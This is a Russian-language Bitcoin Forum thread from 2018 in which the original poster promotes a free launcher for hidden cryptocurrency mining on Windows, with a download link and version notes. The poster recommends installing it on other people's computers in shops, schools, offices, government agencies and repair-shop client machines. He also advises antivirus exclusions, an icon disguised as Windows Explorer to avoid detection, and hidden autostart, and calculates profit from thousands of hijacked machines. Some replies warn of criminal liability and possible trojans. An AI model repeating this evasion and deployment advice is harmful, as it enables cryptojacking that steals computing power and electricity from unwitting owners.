Bitcoin Forum
April 26, 2024, 03:35:32 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Запускатор для скрытого майнинга  (Read 215 times)
bescom (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 1


View Profile WWW
July 15, 2018, 06:22:31 AM
Last edit: December 09, 2018, 10:59:28 AM by bescom
 #1

Программа-запускатор starter_0.06a предназначена для запуска майнинга в относительно скрытом режиме. Умеет работать с ЛЮБЫМИ консольными майнерами на ЛЮБЫХ пулах. Устанавливается на любые компьютеры под управлением Windows 7, 8, 10 с разрядностью х32 и х64.

Программу starter_0.06a можно устанавливать в залах продажи компьютеров, в учебных классах, в копоративных сетях и госучреждениях, на серверах, на клиентских компьютерах в сервисных центрах и мастерских. При этом вся ответственность за использование программы на не принадлежащих вам устройствах ложится сугубо на вас.

У программы есть два режима:


  • Майнеры запускаются во время неактивности пользователя. Время от последней активности пользователя до старта майнеров устанавливается в конфиге. Если пользователь возвращается к работе, майнер выключается, и так до следующего периода неактивности пользователя. Режим лучше подходит для слабых компьютеров.
  • Майнеры запускаются параллельно с работой пользователя. Этот режим подходит для более мощных компьютеров, которые не «почувствуют» занятость одного-двух ядер процессора или части ресурсов видеокарты.

Устанавливая программу, вы можете добавить в работу совершенно любой консольный майнер, который считаете наиболее выгодным и продуктивным. Путь к нему, имя файла майнера и строка конфигурации прописываются в конфиге программы-запускатора.

Программа распространяется абсолютно бесплатно, однако во время работы около 10% профита отчисляется автору. В разных режимах это происходит несколько по-разному. В первом режиме примерно каждый 10-й запуск майнера работает на автора, во втором режиме 6 минут в каждом часе (это те же 10%) майнер работает с конфигом автора.

Что нужно сделать обязательно:

·        Добавить папку программы в исключения антивируса

Что нельзя делать:

·        Нельзя удалять и переименовывать папки майнеров, которые идет в комплекте с программой

·        Нельзя помещать программу по пути с кириллическими символами

Что можно делать:

·        Можно переименовывать запускаемый файл программы, а также создавать дубликаты поставляемых с программой майнеров и переименовывать их

В последнее время появилось много консольных майнеров, которые не имеют в своем составе «батника» (файла .bat), а их параметры прописаны в продвинутых конфигах (майнеры XMRig, XMR-Stak и прочие). С ними программа-запускатор также умеет работать. Для начала нужно отладить запуск майнера отдельно от запускатора, затем в конфиге запускатора прописать путь к майнеру, имя файла майнера, а строку конфигурации оставить пустой, так как параметры в такие майнеры не передаются.

Основная ветка программы starter_0.06a, а также ее предыдущих и будущих версий, находится на форуме Криптопила - http://crypto.pila.pl/viewtopic.php?f=12&t=10 – для всех, кто решит использовать программу в своей работе, будет полезно ознакомиться. Там же изложены некоторые способы сокрытия работы программы и ее автоматического запуска. Я, как автор, отвечаю на вопросы на всех форумах, где есть соответствующая ветка, однако с некоторого времени на форуме пула Minergate затруднилась регистрация, а также не модерируются сообщения новичков, поэтому предпочтительно задавать вопросы здесь. Я буду отвечать на них по мере возможности и при наличии времени, но постараюсь уделить внимание всем, кому потребуется помощь. При этом прошу сначала внимательно изучить описания и инструкции, чтобы не приходилось повторять то, что уже подробно описано.

Скачать альфа-версию нового запускатора starter_0.06a - ЛЮБЫЕ КОНСОЛЬНЫЕ МАЙНЕРЫ, ЛЮБЫЕ ПУЛЫ (в архиве запускатор + конфиг + майнеры)
1714145732
Hero Member
*
Offline Offline

Posts: 1714145732

View Profile Personal Message (Offline)

Ignore
1714145732
Reply with quote  #2

1714145732
Report to moderator
1714145732
Hero Member
*
Offline Offline

Posts: 1714145732

View Profile Personal Message (Offline)

Ignore
1714145732
Reply with quote  #2

1714145732
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1714145732
Hero Member
*
Offline Offline

Posts: 1714145732

View Profile Personal Message (Offline)

Ignore
1714145732
Reply with quote  #2

1714145732
Report to moderator
1714145732
Hero Member
*
Offline Offline

Posts: 1714145732

View Profile Personal Message (Offline)

Ignore
1714145732
Reply with quote  #2

1714145732
Report to moderator
candiela
Member
**
Offline Offline

Activity: 294
Merit: 10


View Profile
July 16, 2018, 06:46:03 PM
 #2

Там же целые фирмы нормально майнить не могут  так-как  производительность падает и становится невыгодно мы всё продолжаем говорить об этих скрытых майнерах.  Детский сад какой-то.
bescom (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 1


View Profile WWW
July 17, 2018, 02:24:30 AM
 #3

Там же целые фирмы нормально майнить не могут  так-как  производительность падает и становится невыгодно мы всё продолжаем говорить об этих скрытых майнерах.  Детский сад какой-то.
Вы так рассуждаете, потому что не пробовали, ну и плюс не пытаетесь посчитать профит. А я для Вас это сделаю, чисто навскидку. Итак, поехали.
-
Скажем, имеется контора с сотней компьютеров от нетбука (около 2 хэшей в секунду на одном ядре на Monero) до i7 (до 100 хэшей), поэтому за среднюю величину примем 50 хэшей. Калькулируем и получаем, что 50х/с * 100 компов = 5000 х/с, что даст более 4 баксов в сутки. И это только на одном ядре и при многих прочих заниженных переменных. В реальности цифры больше в разы. Причем, всё достается одному человеку и при этом никто не напрягается. Что, серьезно, Вы и сейчас считаете, что скрытые майнеры - это детский сад?  Wink А вот множество людей, использующих мои сборки, так не считают, а зарабатывают денежку, порой очень серьезную, потому как у многих парк компьютеров состоит не из сотни компов, а из нескольких тысяч, а накладные расходы при этом - 0 рублей, так как не нужно ни строить фермы, ни покупать видеокарты, ни платить за искричество.
Так что, Вам за Ваше мнение спасибо, оно дало повод пояснить людям на цифрах выгодность установки скрытых майнеров.
[As]
Jr. Member
*
Offline Offline

Activity: 168
Merit: 3


View Profile
July 19, 2018, 03:31:17 AM
 #4

Не за что. Smiley Ну а как еще можно назвать программу, которая запускает что-то? Wink
Ну для меня болие привычно слышать авторан. Обычно это файл назвывающийся Autorun, обычно имеющий расширение (inf) его то как раз таки и используют для автоматического запуска или установки приложений в среде операционной системы Microsoft Windows.
bescom (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 1


View Profile WWW
July 19, 2018, 02:00:56 PM
 #5

Не за что. Smiley Ну а как еще можно назвать программу, которая запускает что-то? Wink
Ну для меня болие привычно слышать авторан. Обычно это файл назвывающийся Autorun, обычно имеющий расширение (inf) его то как раз таки и используют для автоматического запуска или установки приложений в среде операционной системы Microsoft Windows.
Понимаете, у моей программы другой принцип, так что аналогия как бы неверная. Запускаторами в конце 90х - начале 2000х называли как раз и стартовые оболочки, и программы управления чем-либо. В данном случае это не инсталлятор, не авторан, а программа управления майнерами.
bescom (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 1


View Profile WWW
October 21, 2018, 03:25:39 PM
Last edit: October 29, 2018, 04:16:02 PM by bescom
 #6

Товарищи майнеры, встречайте новую версию запускатора...

Что нового:

1. Удалены старые версии и внедрены новые. Это касается всех майнеров, входящих в сборку, включая майнергейтовский.
2. Внедрен высокопроизводительный майнер JCE. Советую присмотреться к нему повнимательнее - он умеет работать на виндах любой разрядности, на процах и видеокартах, его интерфейс очень информативен, а хэшрейт выше. В папке с майнером я привел примеры батников для разных криптовалют на разных пулах.
3. Изменена иконка запускатора. Теперь она как две капли воды похожа на иконку проводника. Это хоть немного, но снизит риск обнаружения.
4. Неожиданно для себя я узнал, что высокопроизводительный майнер XMRig можно запускать батником, поэтому в папке с майнером поместил пример - пригодится многим.

Немного о том, что хочу внедрить в будущем.
Планирую сделать полуавтоматическое обновление майнеров, и вот с какой целью. Скажем так, многие монеты по разным причинам (в основном, чтобы затруднить добычу асиками) периодически переживают смену алгоритмов и, как следствие, хардфорки. Для пользователей моего запускатора это означает: "иди и на десятках/сотнях/тысячах машин переставляй запускатор и настраивай его на работу с новым майнером". При этом синтаксис майнеров от версии к версии редко меняется (за исключением майнеров Minergate, к сожалению). Таким образом, можно будет сделать полуавтоматическое обновление нужных майнеров, при этом настройки будут сохраняться. Такой вариант позволит уж точно "поставить и забыть".

Скачать альфа-версию нового запускатора starter_0.06a - ЛЮБЫЕ КОНСОЛЬНЫЕ МАЙНЕРЫ, ЛЮБЫЕ ПУЛЫ (в архиве запускатор + конфиг + майнеры)
mak013
Hero Member
*****
Offline Offline

Activity: 2352
Merit: 751



View Profile
October 21, 2018, 03:57:32 PM
 #7

итого за 4 бакса в сутки в фирме на 100 компов имеет регулярный шанс неиллюзорно выхватить за свое рукоблудство. 8к рублей в месяц. со 100 компов, где 50 и7 и 50 нетбуков. а в случае, если вскроется, то на вас повесят всех собак, включая электроэнергию всей организации, выход из строя всей техники за последние месяцев 10-20, а заодно, если админ не дурной, еще и своего горелого железа гостями притащит. и всё это за 8к в месяц. удачи всем желающим, чо Smiley

███████████████████████████
███████▄████████████▄██████
████████▄████████▄████████
███▀█████▀▄███▄▀█████▀███
█████▀█▀▄██▀▀▀██▄▀█▀█████
███████▄███████████▄███████
███████████████████████████
███████▀███████████▀███████
████▄██▄▀██▄▄▄██▀▄██▄████
████▄████▄▀███▀▄████▄████
██▄███▀▀█▀██████▀█▀███▄███
██▀█▀████████████████▀█▀███
███████████████████████████
.
.Duelbits.
..........UNLEASH..........
THE ULTIMATE
GAMING EXPERIENCE
██████
██
██
██
██
██
██
██
██
██
██
██
██████
████████████▄▄██▄▄
████████████████████▄▄
░████▄▄████████████████
░█████████████████████
█████████████████▀▀██▀
█████████████████░▄██▄
████████████████░░▀██▀
███████████████
███████████
██████████
█████████
████████
██████████
bescom (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 1


View Profile WWW
October 21, 2018, 04:48:46 PM
 #8

итого за 4 бакса в сутки в фирме на 100 компов ........ 8к рублей в месяц. со 100 компов, где 50 и7 и 50 нетбуков. ...
Вот мне всегда интересно, почему люди читают невнимательно, а потом, делая из прочитанного неверные выводы, строят дальнейшие рассуждения...
Расчёт, что Вы берёте, приведен просто для примера, как ответ на совершенно другой вопрос. И к расчёту добавлено следующее:
Quote
И это только на одном ядре и при многих прочих заниженных переменных. В реальности цифры больше в разы.
Конечно, и в Ваших рассуждениях есть доля правды, потому что при установке скрытых майнеров существует риск. Ну так и за грибами тогда давайте в лес не ходить, можно же ногу сломать или на медведя набрести. Wink
mak013
Hero Member
*****
Offline Offline

Activity: 2352
Merit: 751



View Profile
October 21, 2018, 06:04:25 PM
 #9

итого за 4 бакса в сутки в фирме на 100 компов ........ 8к рублей в месяц. со 100 компов, где 50 и7 и 50 нетбуков. ...
Вот мне всегда интересно, почему люди читают невнимательно, а потом, делая из прочитанного неверные выводы, строят дальнейшие рассуждения...
Расчёт, что Вы берёте, приведен просто для примера, как ответ на совершенно другой вопрос. И к расчёту добавлено следующее:
Quote
И это только на одном ядре и при многих прочих заниженных переменных. В реальности цифры больше в разы.
Конечно, и в Ваших рассуждениях есть доля правды, потому что при установке скрытых майнеров существует риск. Ну так и за грибами тогда давайте в лес не ходить, можно же ногу сломать или на медведя набрести. Wink
ну и у меня для примера приведены цифры на вашем примере Smiley
не, кому-то это покажется выгодным, для кого-то риск оправдан, не спорю. только в реальности и уголовка может светить. а человек, для которого это хорошие деньги вряд ли будет нанимать хороших и, следовательно, дорогих адвокатов. опять же просто пример.

вы описываете просто только плюсы, легкие деньги, копеечка не лишняя, затрат никаких. а я вот описал немного минусов. для полноты картины.
это я еще не говорил, про анализ вашей программы, вероятность содержания в ней тех же самых троянов например.

ЗЫ. а за грибами я не хожу, я их покупаю Smiley

███████████████████████████
███████▄████████████▄██████
████████▄████████▄████████
███▀█████▀▄███▄▀█████▀███
█████▀█▀▄██▀▀▀██▄▀█▀█████
███████▄███████████▄███████
███████████████████████████
███████▀███████████▀███████
████▄██▄▀██▄▄▄██▀▄██▄████
████▄████▄▀███▀▄████▄████
██▄███▀▀█▀██████▀█▀███▄███
██▀█▀████████████████▀█▀███
███████████████████████████
.
.Duelbits.
..........UNLEASH..........
THE ULTIMATE
GAMING EXPERIENCE
██████
██
██
██
██
██
██
██
██
██
██
██
██████
████████████▄▄██▄▄
████████████████████▄▄
░████▄▄████████████████
░█████████████████████
█████████████████▀▀██▀
█████████████████░▄██▄
████████████████░░▀██▀
███████████████
███████████
██████████
█████████
████████
██████████
bescom (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 1


View Profile WWW
October 22, 2018, 03:14:15 AM
 #10

не, кому-то это покажется выгодным, для кого-то риск оправдан, не спорю. только в реальности и уголовка может светить. а человек, для которого это хорошие деньги вряд ли будет нанимать хороших и, следовательно, дорогих адвокатов. опять же просто пример.

вы описываете просто только плюсы, легкие деньги, копеечка не лишняя, затрат никаких. а я вот описал немного минусов. для полноты картины.
Речь о том и идет, что каждый сам решает, насколько оправдан риск, и я в первом же посте предупреждаю пользователей о возможных рисках.
это я еще не говорил, про анализ вашей программы, вероятность содержания в ней тех же самых троянов например.
Думаете, в программу, которая предназначена для извлечения прибыли, разработчик будет, аки идиот, встраивать зловреды? Wink Извините, но я не Майкрософт, я от такого еще далек. Майнеры в пакете штатные, от производителей, без изменений, а программа просто управляет ими. Впрочем, никто Вам не запрещает сделать анализ. Только не надо делать это Вирустоталом, как любят школьники. Wink
WeAccept
Newbie
*
Offline Offline

Activity: 25
Merit: 0


View Profile
October 27, 2018, 12:16:45 PM
 #11

ребят пользовался кто, годная штука? "запускатор" Smiley
bescom (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 1


View Profile WWW
October 27, 2018, 05:51:11 PM
 #12

ребят пользовался кто, годная штука? "запускатор" Smiley
Здесь вряд ли Вам кто-нибудь ответит, так как мы с запускатором тут недавно. Почитайте тему на МГ (ссылка есть в первом посте), там много мнений и отзывов.
GasMan512
Jr. Member
*
Offline Offline

Activity: 112
Merit: 1

Look ARROUND!


View Profile
October 30, 2018, 04:29:18 PM
 #13

Что то мне кажется что овчинка выделки не стоит)

ARROUND || Decentralized Augmented Reality Platform || ARROUND
Look ARROUND!
bescom (OP)
Newbie
*
Offline Offline

Activity: 18
Merit: 1


View Profile WWW
October 30, 2018, 04:58:16 PM
 #14

Что то мне кажется что овчинка выделки не стоит)
Вы правы, если компов один-два-три. С десятка-другого уже ощутимо получится.
Был один пользователь, который мне по скайпу делился опытом. Рассказывал, что у него в обслуживании несколько сотен компов, работающих на видеонаблюдении, так вот он выжимал в круглосуточном режиме на XMR до 30 килохэшей, причем при всего одном задействованном в майнинге ядре на каждом компе. Можете прикинуть, выгодно это или нет.  Wink
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!